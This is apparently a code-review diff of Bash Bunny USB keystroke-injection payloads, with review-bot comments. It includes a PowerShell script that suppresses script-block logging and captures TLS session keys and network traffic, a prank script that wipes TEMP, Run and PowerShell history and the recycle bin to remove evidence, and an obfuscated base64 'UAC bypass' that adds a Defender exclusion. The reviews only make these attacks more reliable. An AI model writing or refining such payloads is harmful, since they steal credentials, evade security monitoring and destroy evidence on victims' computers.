|
||||
Q STRING "\$BB_SWITCH = \"\${BB_VOLUME}payloads\\${SWITCH_POSITION}\\\""
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "CD \"\${BB_SWITCH}\""
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
LED STAGE3
|
||||
|
||||
Q STRING ".\payload.ps1 -BB_VOLUME \"\${BB_VOLUME}\" -RECORDER_TIME ${RECORDER_TIME}"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
LED SPECIAL
|
||||
|
||||
until [ -f /root/udisk/loot/done.txt ]; do sleep 10; sync; done
|
||||
|
||||
######## CLEANUP ########
|
||||
|
||||
LED CLEANUP
|
||||
|
||||
rm /root/udisk/loot/done.txt
|
||||
sync
|
||||
udisk unmount
|
||||
|
||||
######## FINISH ########
|
||||
|
||||
LED FINISH
|
||||
|
||||
shutdown -h 0
|
|
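Review bot: `Target: Since Microsoft Windows 7 and 2008 R2` is not backed by the code this runs: payload.ps1 reflects into `System.Management.Automation.Tracing.PSEtwLogProvider`, which is not present in the PowerShell 2.0 that Windows 7 ships (`GetType` returns `$null` and the `GetField` call throws), and calls `Write-VolumeCache` from the Storage module, which Windows 7 does not have; TESTED ON lists only Windows 10 20H2, and the header should say so. The `until [ -f /root/udisk/loot/done.txt ]; do sleep 10; sync; done` wait has no upper bound, so if the PowerShell window never opens (wrong keyboard layout, blocked execution, no logged-on session) the device sits in SPECIAL forever with storage mounted; bound it by `RECORDER_TIME` plus a margin and fall through to CLEANUP either way. `shutdown -h 0` at the end is also not mentioned anywhere in the README.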
@ -0,0 +1,63 @@
|
|||
# "Microsoft Windows" SSLKEYLOG
|
||||
|
||||
- Title: Win_SSLKeyLog
|
||||
- Author: TW-D
|
||||
- Version: 1.0
|
||||
- Target: Microsoft Windows
|
||||
- Category: Credentials
|
||||
|
||||
## Description
|
||||
|
||||
>
|
||||
> Captures the client network session.
|
||||
>
|
||||
> Captures the client side session keys.
|
||||
>
|
||||
|
||||
1) Partially avoids "PowerShell Script Block Logging".
|
||||
2) Closing of all windows.
|
||||
3) Hide "PowerShell" window.
|
||||
4) Check if current process have "Administrator" privilege.
|
||||
5) Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information.
|
||||
6) Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)".
|
||||
7) Writes the file system cache to disk.
|
||||
8) Safely eject.
|
||||
|
||||
## Configuration
|
||||
|
||||
From "payload.txt" change the values of the following constants :
|
||||
```bash
|
||||
|
||||
######## INITIALIZATION ########
|
||||
|
||||
readonly BB_LABEL="BashBunny"
|
||||
readonly SNIFFING_TIME=300
|
||||
|
||||
|
||||
```
|
||||
|
||||
## Required
|
||||
|
||||
Utility that converts an .etl file containing a Windows network packet capture into .pcapng format.
|
||||
[ETL2PCAPNG](https://github.com/microsoft/etl2pcapng)
|
||||
|
||||
Wireshark network protocol analyzer.
|
||||
[WIRESHARK](https://www.wireshark.org/)
|
||||
|
||||
## Steps
|
||||
|
||||
Convert "capture.etl" file into "capture.pcapng" with "etl2pcapng".
|
||||
```
|
||||
.\etl2pcapng.exe .\capture.etl .\capture.pcapng
|
||||
```
|
||||
|
||||
Open your "capture.pcapng" with "Wireshark".
|
||||
|
||||
Configure "Wireshark" for HTTPS decryption.
|
||||
```
|
||||
Edit - Preferences
|
||||
Protocols - (SSL and/or TLS)
|
||||
(Pre)-Master-Secret log filename -> Browse -> SSLKEYLOGFILE.txt
|
||||
```
|
||||
|
||||
Happy hunting.
|
|
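Review bot: The Description should state which clients `SSLKEYLOGFILE` actually affects. It is read at process start by NSS/Firefox, Chromium-based browsers and OpenSSL/BoringSSL-linked tools such as curl, and ignored by anything using SChannel (Internet Explorer, .NET, WinHTTP, most Windows services), so traffic from those appears in `capture.pcapng` but cannot be decrypted, and a browser that was already running when the variable was set logs nothing. Without that caveat "Captures the client side session keys" is misleading. Under Required, also say that `netsh trace` needs an elevated session (item 4 checks for it, and payload.txt's REQUIREMENTS block says the user must be an administrator, but this README never does), and under Configuration that `SNIFFING_TIME` is in seconds.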
@ -0,0 +1,58 @@
|
|||
#
|
||||
# Author: TW-D
|
||||
# Version: 1.0
|
||||
#
|
||||
|
||||
Param (
|
||||
[String] $BB_VOLUME,
|
||||
[Int] $SNIFFING_TIME
|
||||
)
|
||||
|
||||
# Partially avoids "PowerShell Script Block Logging".
|
||||
#
|
||||
$etw_provider = [Ref].Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider").GetField("etwProvider", "NonPublic,Static")
|
||||
$event_provider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid())
|
||||
$etw_provider.SetValue($null, $event_provider)
|
||||
|
||||
# Closing of all windows.
|
||||
#
|
||||
Get-Process -Name "explorer" | Stop-Process
|
||||
|
||||
# Hide "PowerShell" window.
|
||||
#
|
||||
$Script:showWindowAsync = Add-Type -MemberDefinition @"
|
||||
[DllImport("user32.dll")]
|
||||
public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
|
||||
"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru
|
||||
$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null
|
||||
|
||||
# Check if current process have "Administrator" privilege.
|
||||
#
|
||||
If ( ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") ) {
|
||||
|
||||
$bb_loot = "${BB_VOLUME}loot\"
|
||||
|
||||
# Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information.
|
||||
#
|
||||
[Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", $null, "User")
|
||||
[Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", "${bb_loot}SSLKEYLOGFILE.txt", "User")
|
||||
|
||||
# Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)".
|
||||
#
|
||||
(NETSH trace start capture=yes report=no persistent=yes traceFile="${bb_loot}capture.etl" maxSize=0 fileMode=append) | Out-Null
|
||||
Start-Sleep -Seconds $SNIFFING_TIME
|
||||
(NETSH trace stop) | Out-Null
|
||||
|
||||
[Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", $null, "User")
|
||||
|
||||
}
|
||||
|
||||
"Win_SSLKeyLog terminated." | Out-File -FilePath .\..\..\loot\done.txt -Force
|
||||
|
||||
# Writes the file system cache to disk (thanks to @dark_pyrro).
|
||||
#
|
||||
Write-VolumeCache -DriveLetter ("${BB_VOLUME}".Substring(0,1))
|
||||
|
||||
# Safely eject (thanks to @Night (9o3)).
|
||||
#
|
||||
(New-Object -ComObject Shell.Application).Namespace(17).ParseName("${BB_VOLUME}").InvokeVerb("Eject")
|
|
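Review bot: `persistent=yes` on the `NETSH trace start` line makes the trace session survive reboots and `maxSize=0` removes the file-size cap, so if the script is interrupted before `NETSH trace stop` (device unplugged, PowerShell window closed) the capture keeps running after the drive is gone and grows without bound; from the target's point of view that is a permanent, unbounded packet capture of their own machine. Drop `persistent=yes` and put the stop and the `SSLKEYLOGFILE` reset in a `finally`, since the variable is written to the user's persistent environment (`"User"` scope, i.e. `HKCU\Environment`) and is only cleared if execution reaches the second `SetEnvironmentVariable`. As in Win_ProblemStepsRecorder, the non-admin path still writes "terminated" to `done.txt` with no indication that nothing was captured.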
@ -0,0 +1,108 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: Win_SSLKeyLog
|
||||
#
|
||||
# Description:
|
||||
# Captures the client network session.
|
||||
# Captures the client side session keys.
|
||||
#
|
||||
# 1) Partially avoids "PowerShell Script Block Logging".
|
||||
# 2) Closing of all windows.
|
||||
# 3) Hide "PowerShell" window.
|
||||
# 4) Check if current process have "Administrator" privilege.
|
||||
# 5) Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information.
|
||||
# 6) Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)".
|
||||
# 7) Writes the file system cache to disk (thanks to @dark_pyrro).
|
||||
# 8) Safely eject (thanks to @Night (9o3)).
|
||||
#
|
||||
# Author: TW-D
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Target: Microsoft Windows 10
|
||||
# Attackmodes: HID and STORAGE
|
||||
#
|
||||
# TESTED ON
|
||||
# ===============
|
||||
# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
|
||||
# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
|
||||
#
|
||||
# REQUIREMENTS
|
||||
# ===============
|
||||
# The target user must belong to the 'Administrator' group.
|
||||
#
|
||||
# STATUS
|
||||
# ===============
|
||||
# Magenta solid ................................... SETUP
|
||||
# Yellow single blink ............................. ATTACK
|
||||
# Yellow double blink ............................. STAGE2
|
||||
# Yellow triple blink ............................. STAGE3
|
||||
# Cyan inverted single blink ...................... SPECIAL
|
||||
# White fast blink ................................ CLEANUP
|
||||
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
|
||||
|
||||
######## INITIALIZATION ########
|
||||
|
||||
readonly BB_LABEL="BashBunny"
|
||||
readonly SNIFFING_TIME=300
|
||||
|
||||
######## SETUP ########
|
||||
|
||||
LED SETUP
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
GET SWITCH_POSITION
|
||||
udisk mount
|
||||
|
||||
######## ATTACK ########
|
||||
|
||||
LED ATTACK
|
||||
|
||||
Q DELAY 5000
|
||||
Q GUI r
|
||||
Q DELAY 5000
|
||||
Q STRING "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
|
||||
Q DELAY 1500
|
||||
Q CTRL-SHIFT ENTER
|
||||
Q DELAY 5000
|
||||
Q LEFTARROW
|
||||
Q DELAY 3000
|
||||
Q ENTER
|
||||
Q DELAY 7000
|
||||
|
||||
LED STAGE2
|
||||
|
||||
Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)\""
|
||||
Q ENTER
|
||||
Q DELAY 3500
|
||||
|
||||
Q STRING "\$BB_SWITCH = \"\${BB_VOLUME}payloads\\${SWITCH_POSITION}\\\""
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "CD \"\${BB_SWITCH}\""
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
LED STAGE3
|
||||
|
||||
Q STRING ".\payload.ps1 -BB_VOLUME \"\${BB_VOLUME}\" -SNIFFING_TIME ${SNIFFING_TIME}"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
LED SPECIAL
|
||||
|
||||
until [ -f /root/udisk/loot/done.txt ]; do sleep 10; sync; done
|
||||
|
||||
######## CLEANUP ########
|
||||
|
||||
LED CLEANUP
|
||||
|
||||
rm /root/udisk/loot/done.txt
|
||||
sync
|
||||
udisk unmount
|
||||
|
||||
######## FINISH ########
|
||||
|
||||
LED FINISH
|
||||
|
||||
shutdown -h 0
|
|
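Review bot: The `CTRL-SHIFT ENTER`, `LEFTARROW`, `ENTER` sequence assumes the UAC consent dialog appears with focus on "No", which holds only for an administrator account at the default prompt level; for a standard user the credential dialog appears instead, the script then runs unelevated, and payload.ps1 silently skips the capture. The REQUIREMENTS block should say that, not just "must belong to the 'Administrator' group". `Q LEFTARROW` is also spelled `LEFT` in the other payloads in this commit; pick one. The header's `Target: Microsoft Windows 10` disagrees with the README's generic "Microsoft Windows", and the unbounded `until [ -f ... done.txt ]` wait and the final `shutdown -h 0` have the same problems noted for Win_ProblemStepsRecorder's payload.txt.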
@ -0,0 +1,89 @@
|
|||
############################################################################################################################################################
|
||||
# | ___ _ _ _ # ,d88b.d88b #
|
||||
# Title : Play-WAV | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
|
||||
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
|
||||
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
|
||||
# Category : Execution | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
|
||||
# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
|
||||
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
|
||||
# Dependencies : Dropbox | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
|
||||
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
|
||||
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
|
||||
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
|
||||
# # / \ / ~ \ #
|
||||
# github.com/I-Am-Jakoby # \ / \~ ~/ #
|
||||
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
|
||||
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
|
||||
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
|
||||
############################################################################################################################################################
|
||||
|
||||
<#
|
||||
.NOTES
|
||||
This script requires you to have a DropBox account or another file hosting service
|
||||
|
||||
.DESCRIPTION
|
||||
This program downloads a sound from your DropBox
|
||||
Turns the volume to max level on victims PC
|
||||
Pauses the script until a mouse movement is detected
|
||||
Then plays the sound with nothing popping up catching your victim off guard
|
||||
Finally a few lines of script are executed to empty TMP folder, clear Run and Powershell history
|
||||
|
||||
#>
|
||||
|
||||
############################################################################################################################################################
|
||||
|
||||
# Download Sound (When using your own link "dl=0" needs to be changed to "dl=1")
|
||||
iwr https:// <Your DropBox shared link intended for file> ?dl=1 -O $env:TMP\e.wav
|
||||
|
||||
############################################################################################################################################################
|
||||
|
||||
# This turns the volume up to max level
|
||||
$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)}
|
||||
|
||||
############################################################################################################################################################
|
||||
|
||||
# This while loop will constantly check if the mouse has been moved
|
||||
# if the mouse has not moved "SCROLLLOCK" will be pressed to prevent screen from turning off
|
||||
# it will then sleep for the indicated number of seconds and check again
|
||||
|
||||
Add-Type -AssemblyName System.Windows.Forms
|
||||
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
|
||||
|
||||
while (1) {
|
||||
$pauseTime = 3
|
||||
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
|
||||
break
|
||||
}
|
||||
else {
|
||||
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
|
||||
}
|
||||
}
|
||||
############################################################################################################################################################
|
||||
|
||||
# Play Sound
|
||||
$PlayWav=New-Object System.Media.SoundPlayer;$PlayWav.SoundLocation="$env:TMP\e.wav";$PlayWav.playsync()
|
||||
|
||||
############################################################################################################################################################
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This is to clean up behind you and remove any evidence to prove you were there
|
||||
#>
|
||||
|
||||
# Delete contents of Temp folder
|
||||
|
||||
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
|
||||
|
||||
# Delete run box history
|
||||
|
||||
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
|
||||
|
||||
# Delete powershell history
|
||||
|
||||
Remove-Item (Get-PSreadlineOption).HistorySavePath
|
||||
|
||||
# Deletes contents of recycle bin
|
||||
|
||||
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
|
||||
|
|
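Review bot: the comment on L16046 says SCROLLLOCK is pressed to keep the screen awake, but the loop at L16080 sends `{CAPSLOCK}`; toggling Caps Lock every 3 seconds lights the keyboard LED and flips the case of anything the user types, which is exactly the kind of tell this payload is trying to avoid, so either send `{SCROLLLOCK}` or fix the comment. The movement check at L16057 and L16068 compares only `Position.X`, so a purely vertical mouse move never breaks the loop; compare the whole `Position` point instead. L16020 leaves spaces around the `<Your DropBox shared link intended for file>` placeholder, so the committed line is not a single URI token and will not parse until edited; a `$url` variable at the top of the script (with the `dl=1` note next to it) makes the one required edit obvious. The cleanup block is also worth a second look: `rm $env:TEMP\* -r -Force` (L16128) and `Clear-RecycleBin -Force` (L16158) delete the target user's own files, which goes well beyond the `.NOTES` claim of removing evidence of the payload, and `(Get-PSReadlineOption).HistorySavePath` (L16148) depends on PSReadLine being loadable in the hidden `-NonI` session started by payload.txt; if it is not, the call throws and `Remove-Item` receives a null path. Deleting only `e.wav` and the RunMRU entry (the real artifact of a `GUI r` launch) would do what the notes promise without the collateral damage.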
@ -0,0 +1,99 @@
|
|||
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
|
||||
|
||||
<!-- TABLE OF CONTENTS -->
|
||||
<details>
|
||||
<summary>Table of Contents</summary>
|
||||
<ol>
|
||||
<li><a href="#Description">Description</a></li>
|
||||
<li><a href="#getting-started">Getting Started</a></li>
|
||||
<li><a href="#Contributing">Contributing</a></li>
|
||||
<li><a href="#Version-History">Version History</a></li>
|
||||
<li><a href="#Contact">Contact</a></li>
|
||||
<li><a href="#Acknowledgments">Acknowledgments</a></li>
|
||||
</ol>
|
||||
</details>
|
||||
|
||||
# Play-WAV
|
||||
|
||||
A script used to download a WAV file and play it after a mouse movement is detected
|
||||
|
||||
## Description
|
||||
|
||||
This program starts off by using an Invoke-WebRequest to download a WAV file
|
||||
The system volume is then turned up to the max level
|
||||
Then the script will be paused until a mouse movement is detected
|
||||
After one is the WAV file will be played
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* DropBox - Your Shared link for the intended file
|
||||
* Windows 10,11
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
* Invoke-WebRequest will be entered in the Run Box to download your WAV file
|
||||
```
|
||||
powershell -w h -NoP -NonI -Exec Bypass iwr https:// < Your Shared link for the intended file> ?dl=1 -O $env:TMP\e.wav
|
||||
```
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Contributing
|
||||
|
||||
All contributors names will be listed here
|
||||
|
||||
I am Jakoby
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Version History
|
||||
|
||||
* 0.1
|
||||
* Initial Release
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- CONTACT -->
|
||||
## Contact
|
||||
|
||||
<div><h2>I am Jakoby</h2></div>
|
||||
<p><br/>
|
||||
|
||||
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
|
||||
|
||||
<a href="https://github.com/I-Am-Jakoby/">
|
||||
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.instagram.com/i_am_jakoby/">
|
||||
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
|
||||
</a>
|
||||
|
||||
<a href="https://twitter.com/I_Am_Jakoby/">
|
||||
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.youtube.com/c/IamJakoby/">
|
||||
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
|
||||
</a>
|
||||
|
||||
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-Play-WAV)
|
||||
</p>
|
||||
|
||||
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- ACKNOWLEDGMENTS -->
|
||||
## Acknowledgments
|
||||
|
||||
* [Hak5](https://hak5.org/)
|
||||
* [MG](https://github.com/OMG-MG)
|
||||
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
|
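Review bot: the 'Executing program' section (L16269 to L16278) tells the reader an `iwr` one-liner is typed into the Run box, but the payload.txt in this commit (L16487) dot-sources `Play-WAV.ps1` from the Bunny's storage and the download happens inside that script, so the README never states the one edit the user actually has to make: replacing the placeholder Dropbox link at the top of `Play-WAV.ps1` and changing `dl=0` to `dl=1`. Please describe that edit instead of the Run-box command. Smaller points: `Project Link:` on L16391 opens with `[` and closes with `)`, so it does not render as a link; L16233 'After one is the WAV file will be played' should read 'Once movement is detected the WAV file is played'; and the version history says 0.1 (L16313) while payload.txt says 1.0 (L16441).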
@ -0,0 +1,26 @@
|
|||
# Title: Play-WAV
|
||||
# Description: This payload will download a WAV file, pause until a mouse movement is detected then play the sound effect
|
||||
# Author: I am Jakoby
|
||||
# Version: 1.0
|
||||
# Category: Execution
|
||||
# Attackmodes: HID, Storage
|
||||
# Target: Windows 10, 11
|
||||
|
||||
LED SETUP
|
||||
|
||||
GET SWITCH_POSITION
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
LED STAGE1
|
||||
|
||||
QUACK DELAY 3000
|
||||
QUACK GUI r
|
||||
QUACK DELAY 100
|
||||
LED STAGE2
|
||||
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Play-WAV.ps1')"
|
||||
QUACK ENTER
|
||||
|
||||
|
||||
|
||||
|
|
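Review bot: the launch line at L16487 passes `-NoP -NonI -W Hidden` but no `-Exec Bypass`, and dot-sourcing a `.ps1` from the mounted volume is subject to the execution policy, which is `Restricted` on a default Windows 10/11 client, so the script is refused on an unmodified target; add `-Exec Bypass`, as the README's own one-liner (L16275) and the shortcut arguments written by Shortcut-Jacker (L17595) already do. Two smaller points: the payload never signals completion, so add `LED FINISH` after `QUACK ENTER` (L16490); and `QUACK DELAY 3000` (L16475) is the only margin for the storage volume to enumerate before the `GUI r` launch, and if the file is not yet there the `.()` call fails silently inside the hidden window, so a longer delay is the safer default.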
@ -0,0 +1,97 @@
|
|||
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
|
||||
|
||||
<!-- TABLE OF CONTENTS -->
|
||||
<details>
|
||||
<summary>Table of Contents</summary>
|
||||
<ol>
|
||||
<li><a href="#Description">Description</a></li>
|
||||
<li><a href="#getting-started">Getting Started</a></li>
|
||||
<li><a href="#Contributing">Contributing</a></li>
|
||||
<li><a href="#Version-History">Version History</a></li>
|
||||
<li><a href="#Contact">Contact</a></li>
|
||||
<li><a href="#Acknowledgments">Acknowledgments</a></li>
|
||||
</ol>
|
||||
</details>
|
||||
|
||||
# Safe Haven
|
||||
|
||||
A script used to open an elevated powershell console and created a folder ignored by the AntiVirus
|
||||
|
||||
## Description
|
||||
|
||||
This is a UAC bypass payload that will open an elevated powershell console
|
||||
|
||||
Next a Directory called "safe" will be generated in your Documents Directory
|
||||
|
||||
The "safe" directory will be added to the Window's Defender Exclusion list
|
||||
|
||||
The AntiVirus will ignore all files downloaded to or ran from here
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* Windows 10,11
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
* A keystroke injection based payload will run
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Contributing
|
||||
|
||||
All contributors names will be listed here
|
||||
|
||||
I am Jakoby
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Version History
|
||||
|
||||
* 0.1
|
||||
* Initial Release
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- CONTACT -->
|
||||
## Contact
|
||||
|
||||
<div><h2>I am Jakoby</h2></div>
|
||||
<p><br/>
|
||||
|
||||
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
|
||||
|
||||
<a href="https://github.com/I-Am-Jakoby/">
|
||||
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.instagram.com/i_am_jakoby/">
|
||||
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
|
||||
</a>
|
||||
|
||||
<a href="https://twitter.com/I_Am_Jakoby/">
|
||||
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.youtube.com/c/IamJakoby/">
|
||||
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
|
||||
</a>
|
||||
|
||||
Project Link: (https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-SafeHaven)
|
||||
</p>
|
||||
|
||||
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- ACKNOWLEDGMENTS -->
|
||||
## Acknowledgments
|
||||
|
||||
* [Hak5](https://hak5.org/)
|
||||
* [MG](https://github.com/OMG-MG)
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
|
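Review bot: the Description (L16562 to L16577) claims a UAC bypass plus a Defender exclusion but does not say which bypass is used, and the only code shipped for it is an obfuscated deflate/base64 blob in `SafeHaven.txt` (L16809), so neither a reviewer nor a user can verify what ends up running with administrative rights; please commit the plain-text PowerShell (at least as a comment or a linked source file) and name the technique. The README should also state that the logged-on user must be a member of the local Administrators group: a UAC bypass only elevates a token that already holds admin rights, and adding a Defender exclusion from a standard-user account simply fails. Wording: L16552 'created a folder' should be 'creates a folder', L16572 'Window's Defender' should be 'Windows Defender', and `Project Link:` on L16723 is a bare URL in parentheses rather than a markdown link.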
@ -0,0 +1,23 @@
|
|||
REM Title: Safe-Haven
|
||||
|
||||
REM Author: I am Jakoby
|
||||
|
||||
REM Description: This is a UAC bypass payload that will open an elevated powershell console
|
||||
REM Next a Directory called "safe" will be generated in your Documents Directory
|
||||
REM The "safe" directory will be added to the Window's Defender Exclusion list
|
||||
REM The AntiVirus will ignore all files downloaded to or ran from here
|
||||
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING & ( $PShoME[21]+$psHOME[30]+'x')(NEw-objECt IO.COMpresSiON.DeflATESTrEAm([sYStEm.io.MeMOrySTreAm] [SYSTEM.CONVERT]::fROMBase64StRing('hZFPT8JAEMW/yqbxWiDqwYRweFvKtipiLRAhvdTusBj6L93qop/eXRKNXvCyyWTe+72Z2YvFXEy8tjHU6T2V5YCOxHzD9sx/aB7dU8fMD49UMP7R5lozn+qC3YIbiBASvMF0hFjhgHCFF8UvMW2wTvjS1SvFE8xiLA0XCA9Ygs8wM3gCf4eYQya8hzj5RojmeAb/dNyt4iWCGAvj+hpb8BZRjBg2JwI2idUL5focIrF99AhHKGDzrG6b8MpxC8cR19gYxwPuE5sfKVdrRLZvLFfcuPzkZx+r+7MfJhNv3JFiuZTMi+6CVZY2u97kHWVBaW9COhs0lcpSd8Fs0VKdFU1V5bX02FCyC3tjNtz9h6i0r6nvX2uls+CtW1N3cnsO7Tn/rpE2oKXOfdI47fOu99OSqGW+ZlcnvKSSejo7pPc9ynnt72lOli8=' ),[SYsTEM.io.cOmpressION.coMPRESsiOnmode]::DEcOMPRESS )| FoREACh-object{NEw-objECt SySTeM.Io.StreaMreadER( $_ ,[System.teXT.EnCoDINg]::ASCiI) }|foReaCh-objEct {$_.ReAdToEND()} );exit
|
||||
ENTER
|
||||
|
||||
|
||||
|
||||
|
|
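Review bot: the whole payload is the single obfuscated line at L16809 (`$PShoME[21]+$psHOME[30]+'x'` resolves to `iex` on the stock Windows PowerShell 5.1 install path, and it is fed a deflate-compressed base64 blob), so the REM description at L16772 to L16781 cannot be checked against the code; the readable script should be committed alongside, with the obfuscation as a build step rather than the only source. The launch sequence types `powershell` into the Run box and waits only `DELAY 1000` (L16806) before sending the long STRING, which on a slower host starts typing before the console accepts input and drops characters; a longer delay is safer. The console is started without `-W Hidden`, so the user sees a PowerShell window for as long as the blob runs. Finally, the file is Rubber Ducky syntax (REM/DELAY/STRING) consumed via `QUACK` from UrAttaControl's payload.txt (L16875), but its title is 'Safe-Haven' while the directory and README call the payload UrAttaControl; please align the names so the bundle is self-describing.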
@ -0,0 +1,21 @@
|
|||
REM Title: UrAttaControl
|
||||
|
||||
REM Author: I am Jakoby
|
||||
|
||||
REM Description: This is a UAC bypass payload that will open an elevated powershell console and run any script.
|
||||
REM Reaplce the URL down below with a link to a base64 encoded payload you have. See README.md for more details
|
||||
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
LED SETUP
|
||||
|
||||
GET SWITCH_POSITION
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
LED STAGE1
|
||||
|
||||
QUACK DELAY 3000
|
||||
LED STAGE1
|
||||
QUACK ${SWITCH_POSITION}/SafeHaven.txt
|
||||
|
|
